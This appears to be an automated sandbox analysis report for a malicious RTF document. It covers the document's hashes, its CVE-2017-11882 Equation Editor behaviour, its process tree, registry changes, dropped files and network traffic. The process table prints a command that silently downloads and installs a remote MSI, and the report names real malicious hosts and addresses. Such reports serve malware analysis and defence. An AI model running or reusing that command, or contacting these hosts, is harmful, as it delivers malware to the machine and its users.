| download: | protected.doc |
| Full analysis: | https://app.any.run/tasks/01c5842e-34ea-4bda-935f-8c4dfd07f107 |
| Verdict: | Malicious activity |
| Threats: | A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection. |
| Analysis date: | May 20, 2019, 07:02:01 |
| OS: | Windows 7 Professional Service Pack 1 (build: 7601, 64 bit) |
| Tags: | |
| Indicators: | |
| MIME: | text/rtf |
| File info: | Rich Text Format data, version 1, unknown character set |
| MD5: | C5B5C57A2CC8AE78D2D83B6CC0003154 |
| SHA1: | 805B7262F471C64EB5E40D94641D946E3875F780 |
| SHA256: | 743B5C1132BFB088BD5693AB6D38B2CE05F89AA78975EA2AF5DAF61FC06618BC |
| SSDEEP: | 768:s7Kf2sdrM3xaSybdRZXZWkWZNLeRO28LfNCJ1C6NG0xGR4liA0rNdDuRHHWPdCoK:sxxQW3yRsyGEV5e3+JhgGt |
MALICIOUS
Equation Editor starts application (CVE-2017-11882)
- EQNEDT32.EXE (PID: 2976)
- EQNEDT32.EXE (PID: 1804)
Uses Microsoft Installer as loader
- cmd.exe (PID: 1676)
- cmd.exe (PID: 2176)
Downloads executable files from the Internet
- msiexec.exe (PID: 1008)
Changes the autorun value in the registry
- MSI786B.tmp (PID: 2592)
Application was dropped or rewritten from another process
- images.exe (PID: 1420)
- images.exe (PID: 676)
Runs app for hidden code execution
- images.exe (PID: 676)
SUSPICIOUS
Executed via COM
- EQNEDT32.EXE (PID: 2976)
- EQNEDT32.EXE (PID: 1804)
Starts CMD.EXE for commands execution
- EQNEDT32.EXE (PID: 2976)
- EQNEDT32.EXE (PID: 1804)
- images.exe (PID: 676)
Reads the machine GUID from the registry
- msiexec.exe (PID: 1008)
Executable content was dropped or overwritten
- msiexec.exe (PID: 1008)
- MSI786B.tmp (PID: 2592)
Reads Internet Cache Settings
- msiexec.exe (PID: 1008)
Creates files in the user directory
- MSI786B.tmp (PID: 2592)
Starts itself from another location
- MSI786B.tmp (PID: 2592)
Application launched itself
- images.exe (PID: 1420)
INFO
Reads Microsoft Office registry keys
- WINWORD.EXE (PID: 2180)
Reads the machine GUID from the registry
- WINWORD.EXE (PID: 2180)
Reads settings of System Certificates
- msiexec.exe (PID: 1008)
Application was crashed
- EQNEDT32.EXE (PID: 2976)
- EQNEDT32.EXE (PID: 1804)
Application was dropped or rewritten from another process
- MSI786B.tmp (PID: 1344)
- MSI786B.tmp (PID: 2592)
Starts application with an unusual extension
- msiexec.exe (PID: 1008)
- MSI786B.tmp (PID: 1344)
Application launched itself
- MSI786B.tmp (PID: 1344)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
TRiD
| .rtf | | | Rich Text Format (100) |
|---|
EXIF
RTF
| Author: | obidah qudah |
|---|---|
| LastModifiedBy: | Richard |
| CreateDate: | 2018:01:23 22:18:00 |
| ModifyDate: | 2018:07:03 09:28:00 |
| RevisionNumber: | 23 |
| TotalEditTime: | 12 minutes |
| Pages: | 1 |
| Words: | 17 |
| Characters: | 97 |
| CharactersWithSpaces: | 113 |
| InternalVersionNumber: | 57435 |
| Saveprevpict: | - |
Total processes
49
Monitored processes
13
Malicious processes
5
Suspicious processes
2
Behavior graph
Click at the process to see the details
Process information
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 676 | "C:\Users\admin\AppData\Roaming\images.exe" | C:\Users\admin\AppData\Roaming\images.exe | images.exe | ||||||||||||
User: admin Integrity Level: MEDIUM Exit code: 0 Modules
| |||||||||||||||
| 1008 | C:\Windows\system32\msiexec.exe /V | C:\Windows\system32\msiexec.exe | services.exe | ||||||||||||
User: SYSTEM Company: Microsoft Corporation Integrity Level: SYSTEM Description: Windows® installer Exit code: 0 Version: 5.0.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 1344 | "C:\Windows\Installer\MSI786B.tmp" | C:\Windows\Installer\MSI786B.tmp | — | msiexec.exe | |||||||||||
User: admin Integrity Level: MEDIUM Exit code: 0 Modules
| |||||||||||||||
| 1420 | "C:\Users\admin\AppData\Roaming\images.exe" | C:\Users\admin\AppData\Roaming\images.exe | — | MSI786B.tmp | |||||||||||
User: admin Integrity Level: MEDIUM Exit code: 0 Modules
| |||||||||||||||
| 1552 | "C:\Windows\System32\cmd.exe" | C:\Windows\SysWOW64\cmd.exe | — | images.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
| 1676 | cmd.exe & /C CD C: & msiexec.exe /i https://servers.intlde.com/protected.msi /quiet | C:\Windows\SysWOW64\cmd.exe | — | EQNEDT32.EXE | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
| 1756 | msiexec.exe /i https://servers.intlde.com/protected.msi /quiet | C:\Windows\SysWOW64\msiexec.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows® installer Exit code: 0 Version: 5.0.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 1804 | "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding | C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | svchost.exe | ||||||||||||
User: admin Company: Design Science, Inc. Integrity Level: MEDIUM Description: Microsoft Equation Editor Exit code: 0 Version: 00110900 Modules
| |||||||||||||||
| 2176 | cmd.exe & /C CD C: & msiexec.exe /i https://servers.intlde.com/protected.msi /quiet | C:\Windows\SysWOW64\cmd.exe | — | EQNEDT32.EXE | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 1618 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
| 2180 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\protected.doc.rtf" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Exit code: 0 Version: 14.0.5123.5000 Modules
| |||||||||||||||
Total events
1 669
Read events
1 476
Write events
172
Delete events
21
Modification events
| (PID) Process: | (2180) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems |
| Operation: | write | Name: | 8i# |
Value: 3869230084080000010000000000000000000000 | |||
| (PID) Process: | (2180) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
| Operation: | write | Name: | 1033 |
Value: Off | |||
| (PID) Process: | (2180) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
| Operation: | write | Name: | 1033 |
Value: On | |||
| (PID) Process: | (2180) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
| Operation: | write | Name: | 1026 |
Value: On | |||
| (PID) Process: | (2180) WINWORD.EXE | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage |
| Operation: | write | Name: | WORDFiles |
Value: 1320419370 | |||
| (PID) Process: | (2180) WINWORD.EXE | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage |
| Operation: | write | Name: | ProductFiles |
Value: 1320419454 | |||
| (PID) Process: | (2180) WINWORD.EXE | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage |
| Operation: | write | Name: | ProductFiles |
Value: 1320419455 | |||
| (PID) Process: | (2180) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word |
| Operation: | write | Name: | MTTT |
Value: 840800003AD9BBFDD90ED50100000000 | |||
| (PID) Process: | (2180) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems |
| Operation: | write | Name: | %l# |
Value: 256C23008408000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000 | |||
| (PID) Process: | (2180) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems |
| Operation: | delete value | Name: | %l# |
Value: 256C23008408000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000 | |||
Executable files
3
Suspicious files
2
Text files
0
Unknown types
1
Dropped files
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 2180 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR4998.tmp.cvr | — | |
MD5:— | SHA256:— | |||
| 1008 | msiexec.exe | C:\Users\admin\AppData\Local\Temp\~DF716150C76752D455.TMP | — | |
MD5:— | SHA256:— | |||
| 1008 | msiexec.exe | C:\Config.Msi\1b7628.rbs | — | |
MD5:— | SHA256:— | |||
| 1008 | msiexec.exe | C:\Users\admin\AppData\Local\Temp\~DFC2A5BB2275B09E2B.TMP | — | |
MD5:— | SHA256:— | |||
| 1008 | msiexec.exe | C:\Windows\Installer\1b7627.ipi | binary | |
MD5:— | SHA256:— | |||
| 1008 | msiexec.exe | C:\Windows\Installer\MSI786B.tmp | executable | |
MD5:— | SHA256:— | |||
| 1008 | msiexec.exe | C:\Windows\Installer\MSI6C14.tmp | executable | |
MD5:— | SHA256:— | |||
| 1008 | msiexec.exe | C:\Windows\Installer\MSI7760.tmp | binary | |
MD5:— | SHA256:— | |||
| 2180 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$otected.doc.rtf | pgc | |
MD5:— | SHA256:— | |||
| 2592 | MSI786B.tmp | C:\Users\admin\AppData\Roaming\images.exe | executable | |
MD5:— | SHA256:— | |||
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
1
TCP/UDP connections
41
DNS requests
5
Threats
0
HTTP requests
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
1008 | msiexec.exe | GET | 200 | 198.252.108.62:443 | https://servers.intlde.com/protected.msi | CA | executable | 906 Kb | unknown |
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
Connections
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
1008 | msiexec.exe | 198.252.108.62:443 | servers.intlde.com | Hawk Host Inc. | CA | unknown |
676 | images.exe | 88.202.177.235:5200 | fada101.servehttp.com | UK-2 Limited | NL | malicious |
DNS requests
Domain | IP | Reputation |
|---|---|---|
servers.intlde.com |
| unknown |
fada101.servehttp.com |
| malicious |